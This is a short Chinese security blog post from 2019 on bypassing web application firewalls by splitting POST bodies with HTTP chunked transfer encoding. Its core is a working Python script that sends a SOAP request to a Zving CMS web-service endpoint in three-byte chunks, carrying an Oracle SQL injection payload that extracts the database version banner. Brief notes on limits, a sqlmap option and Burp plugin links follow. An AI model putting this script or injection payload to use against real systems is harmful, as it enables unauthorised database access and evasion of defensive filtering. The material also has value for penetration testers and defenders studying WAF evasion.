Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

wpadmin~March 15, 2019 /InfoSec

分块传输绕过 WAF

<!–more–>

基本信息

import requests
from io import BytesIO

def read_in_chunks(file_object, chunk_size=3):
    while True:
        data = file_object.read(chunk_size)
        if not data:
            break
        yield data


data = r'''&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:web=&quot;http://webservice.cms.zving.com&quot;&gt;
   &lt;soapenv:Header/&gt;
   &lt;soapenv:Body&gt;
      &lt;web:addCatalog&gt;
         &lt;web:in0&gt;2&lt;/web:in0&gt;
         &lt;web:in1&gt;{sql}&lt;/web:in1&gt;
         &lt;web:in2&gt;1&lt;/web:in2&gt;
         &lt;web:in3&gt;1&lt;/web:in3&gt;
      &lt;/web:addCatalog&gt;
   &lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;'''

sql = r&quot;' or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null--&quot;

data = BytesIO(data.format(sql=sql))

url = 'http://www.example.com/cmsservice/Services/wsdl/CmsService'

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102','Content-Type': 'text/xml'}

req = requests.post(url, headers=headers,timeout=3, verify=False, data=read_in_chunks(data))

print req.content

a 关于该绕过方法的局限性, chunk 只能在 POST 方法中使用,如果是 GET 方法的注入点就无法绕过。
b 此外新版 sqlmap 已经集成了 chunk 功能, 可以通过 --chunk 指定。

https://github.com/sqlmapproject/sqlmap/pull/3536

参考资料

利用分块传输吊打所有 WAF
https://www.anquanke.com/post/id/169738

分块传输绕过 WAF 的 Burp 插件
【第8周】编写Burp分块传输插件绕WAF
link

chunk-encoded burp 插件
项目编译可以参考 http://wp.blkstone.me/2019/03/maven-basics/
https://github.com/c0ny1/chunked-coding-converter

Leave a Reply

Your email address will not be published. Required fields are marked *